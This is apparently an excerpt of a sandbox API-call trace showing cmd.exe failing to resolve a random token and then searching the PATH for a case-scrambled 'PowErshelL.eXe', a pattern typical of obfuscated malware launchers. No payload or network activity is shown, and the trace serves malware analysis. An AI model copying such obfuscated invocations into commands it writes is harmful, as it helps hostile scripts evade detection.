	[0060.546] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0060.546] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0060.546] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0060.546] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0060.546] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0060.546] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0060.546] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0060.546] GetProcessHeap () returned 0x2e0000
	[0060.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2fa300
	[0060.546] GetProcessHeap () returned 0x2e0000
	[0060.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x2e) returned 0x2f69e0
	[0060.552] GetConsoleTitleW (in: lpConsoleTitle=0x28f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0060.553] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0060.554] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FOR") returned 17
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="IF") returned 14
	[0060.555] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REM") returned 5
	[0060.556] GetProcessHeap () returned 0x2e0000
	[0060.556] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2e1800
	[0060.556] GetProcessHeap () returned 0x2e0000
	[0060.556] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x34) returned 0x2f6a60
	[0060.556] _wcsnicmp (_String1="WNjK", _String2="cmd ", _MaxCount=0x4) returned 20
	[0060.556] GetProcessHeap () returned 0x2e0000
	[0060.556] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2fafd0
	[0060.557] SetErrorMode (uMode=0x0) returned 0x0
	[0060.557] SetErrorMode (uMode=0x1) returned 0x0
	[0060.557] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2fafe0, lpFilePart=0x28ec80 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x28ec80*="Documents") returned 0x1b
	[0060.557] SetErrorMode (uMode=0x0) returned 0x1
	[0060.557] GetProcessHeap () returned 0x2e0000
	[0060.557] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fafd0, Size=0x68) returned 0x2fafd0
	[0060.557] GetProcessHeap () returned 0x2e0000
	[0060.557] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fafd0) returned 0x68
	[0060.557] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0060.557] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0060.557] GetProcessHeap () returned 0x2e0000
	[0060.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x170) returned 0x2e1a20
	[0060.557] GetProcessHeap () returned 0x2e0000
	[0060.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x2d0) returned 0x2fb050
	[0060.563] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb050, Size=0x172) returned 0x2fb050
	[0060.563] GetProcessHeap () returned 0x2e0000
	[0060.563] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb050) returned 0x172
	[0060.563] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0060.563] GetProcessHeap () returned 0x2e0000
	[0060.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2e1ba0
	[0060.563] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1ba0, Size=0x7e) returned 0x2e1ba0
	[0060.563] GetProcessHeap () returned 0x2e0000
	[0060.563] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1ba0) returned 0x7e
	[0060.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.565] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.565] GetLastError () returned 0x2
	[0060.565] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.565] GetLastError () returned 0x2
	[0060.566] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.566] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.567] GetLastError () returned 0x2
	[0060.567] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.567] GetLastError () returned 0x2
	[0060.568] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.568] GetLastError () returned 0x2
	[0060.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.569] GetLastError () returned 0x2
	[0060.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.570] GetLastError () returned 0x2
	[0060.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.570] GetLastError () returned 0x2
	[0060.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.571] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.571] GetLastError () returned 0x2
	[0060.572] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.572] GetLastError () returned 0x2
	[0060.572] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.572] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.573] GetLastError () returned 0x2
	[0060.574] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x28e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9f0) returned 0xffffffffffffffff
	[0060.575] GetLastError () returned 0x2
	[0060.575] _get_osfhandle (_FileHandle=2) returned 0xb
	[0060.583] GetFileType (hFile=0xb) returned 0x2
	[0060.584] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0060.584] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28ee48 | out: lpMode=0x28ee48) returned 1
	[0060.584] _get_osfhandle (_FileHandle=2) returned 0xb
	[0060.584] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x28ee80 | out: lpConsoleScreenBufferInfo=0x28ee80) returned 1
	[0060.584] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0060.586] GetConsoleTitleW (in: lpConsoleTitle=0x28f330, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0060.586] GetFileAttributesW (lpFileName="PowErshelL.eXe" (normalized: "c:\\users\\aetadzjz\\documents\\powershell.exe")) returned 0xffffffff
	[0060.587] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0060.588] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0060.589] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="FOR") returned 10
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="IF") returned 7
	[0060.590] _wcsicmp (_String1="PowErshelL", _String2="REM") returned -2
	[0060.590] SetErrorMode (uMode=0x0) returned 0x0
	[0060.591] SetErrorMode (uMode=0x1) returned 0x0
	[0060.591] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2fb640, lpFilePart=0x28ebc0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x28ebc0*="Documents") returned 0x1b
	[0060.591] SetErrorMode (uMode=0x0) returned 0x1
	[0060.591] GetProcessHeap () returned 0x2e0000
	[0060.591] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb630, Size=0x66) returned 0x2fb630
	[0060.591] GetProcessHeap () returned 0x2e0000
	[0060.591] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb630) returned 0x66
	[0060.591] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0060.591] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0060.591] GetProcessHeap () returned 0x2e0000
	[0060.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x170) returned 0x2e1c30
	[0060.591] GetProcessHeap () returned 0x2e0000
	[0060.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x2d0) returned 0x2fb6b0
	[0060.591] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb6b0, Size=0x172) returned 0x2fb6b0
	[0060.591] GetProcessHeap () returned 0x2e0000
	[0060.591] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb6b0) returned 0x172
	[0060.591] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0060.591] GetProcessHeap () returned 0x2e0000
	[0060.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2fb840
	[0060.592] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb840, Size=0x7e) returned 0x2fb840
	[0060.592] GetProcessHeap () returned 0x2e0000
	[0060.592] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb840) returned 0x7e
	[0060.592] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.592] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.593] GetLastError () returned 0x2
	[0060.593] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.593] GetLastError () returned 0x2
	[0060.593] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.594] GetLastError () returned 0x2
	[0060.594] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.594] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.594] GetLastError () returned 0x2
